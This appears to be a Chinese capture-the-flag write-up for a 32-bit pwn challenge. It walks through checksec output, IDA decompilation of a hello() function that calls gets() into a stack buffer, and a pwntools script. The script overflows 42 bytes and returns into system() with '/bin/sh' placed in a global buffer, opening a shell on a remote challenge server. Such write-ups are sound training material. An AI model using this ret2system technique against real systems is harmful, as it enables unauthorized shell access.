分析
提示是字符串,那就应该是字符串漏洞。运行程序,第一个位置输入name的值,可以第二个位置进行溢出
checksec
保护都关了,可以随便做栈溢出
IDA
有个特殊的函数pwn,里面有system
int pwn()
{
return system("echo hehehe");
}
call system地址为x0804855A,system自己的地址是08048420
main里没什么特殊的,看到有调用hello()
int __cdecl main(int argc, const char **argv, const char **envp)
{
setbuf(stdin, 0);
setbuf(stdout, 0);
setbuf(stderr, 0);
hello();
puts("thank you");
return 0;
}
看一下hello()
char *hello()
{
__int16 *v0; // eax
int v1; // ebx
unsigned int v2; // ecx
__int16 *v3; // eax
__int16 s; // [esp+12h] [ebp-26h] BYREF
int v6; // [esp+14h] [ebp-24h] BYREF
v0 = &s;
v1 = 30;
if ( ((unsigned __int8)&s & 2) != 0 )
{
s = 0;
v0 = (__int16 *)&v6;
v1 = 28;
}
v2 = 0;
do
{
*(_DWORD *)&v0[v2 / 2] = 0;
v2 += 4;
}
while ( v2 < (v1 & 0xFFFFFFFC) );
v3 = &v0[v2 / 2];
if ( (v1 & 2) != 0 )
*v3++ = 0;
if ( (v1 & 1) != 0 )
*(_BYTE *)v3 = 0;
puts("please tell me your name");
fgets(name, 50, stdin);
puts("hello,you can leave some message here:");
return gets((char *)&s);
}
有fgets,变量存入name,name地址是0x0804A080,利用这里进行溢出。溢出后返回地址修改成system()函数,内容用/bin/sh覆盖
exp
cyclic计算偏移是42
from pwn import *
p = remote('61.147.171.105', 50924)
payload=b'a'*42+p32(0x0804855A)+p32(0x0804A080)
# 或者是直接调system函数,而不是直接调call system
# payload=b'a'*42+p32(0x08048420)+p32(0)+p32(0x0804A080)
p.sendlineafter("name\n", '/bin/sh')
p.sendlineafter("here:\n",payload)
p.interactive()